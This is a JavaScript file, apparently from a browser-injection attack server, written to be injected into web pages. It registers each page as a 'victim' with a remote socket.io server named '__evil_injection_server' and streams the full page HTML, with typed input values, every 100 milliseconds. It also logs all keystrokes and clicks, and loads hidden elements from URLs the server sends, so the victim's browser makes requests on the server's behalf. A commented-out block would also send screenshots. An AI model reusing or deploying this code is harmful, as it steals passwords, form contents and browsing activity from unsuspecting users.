jssrv/public/injection_script.js

   1 (function() {
   2
   3 if (window.__injection_active) return
   4 window.__injection_active = true
   5
   6 var socket = io.connect('http://'+__evil_injection_server);
   7 socket.emit('register_victim')
   8 if (window.top === window) {
   9   setInterval(function() {
  10     /*html2canvas(document.body, { onrendered: function(canvas) {
  11       socket.emit('screenshot', {data:canvas.toDataURL()})
  12
  13     }})*/
  14     [].forEach.call(document.getElementsByTagName('input'), function(e) {
  15       e.setAttribute('value', e.value)
  16     })
  17     socket.emit('fulldom', {data:escape(document.childNodes[document.childNodes.length-1].innerHTML)})
  18   }, 100)
  19 }
  20
  21 /*if (window.top === window) {
  22   setInterval(function() {
  23     //var docclone = document.createElement('html')
  24     //docclone.innerHTML = document.body.parentNode.innerHTML
  25
  26   }, 10000)
  27 }*/
  28
  29 window.addEventListener('keydown', function(e) {
  30   socket.emit('keypress', {charCode: e.charCode, keyCode: e.keyCode, type: 'keydown'})
  31 }, true)
  32
  33 window.addEventListener('keypress', function(e) {
  34   socket.emit('keypress', {charCode: e.charCode, keyCode: e.keyCode, type: 'keypress'})
  35 }, true)
  36
  37 window.addEventListener('click', function(e) {
  38   var target = e.target
  39   while (['a','button','input'].indexOf(target.nodeName.toLowerCase()) === -1) {
  40     target = target.parentNode
  41   }
  42   var text = target ? target.innerText : null
  43   socket.emit('keypress', {type: 'click', text: text})
  44 }, true)
  45
  46 socket.on('trigger_request', function(cmd) {
  47   var img_el = document.createElement(cmd.type||'img')
  48   img_el.style.opacity = '0%'
  49   img_el.src = cmd.url
  50   document.body.appendChild(img_el)
  51   setTimeout(function() {
  52     document.body.removeChild(img_el)
  53   }, 60000)
  54 })
  55
  56 })()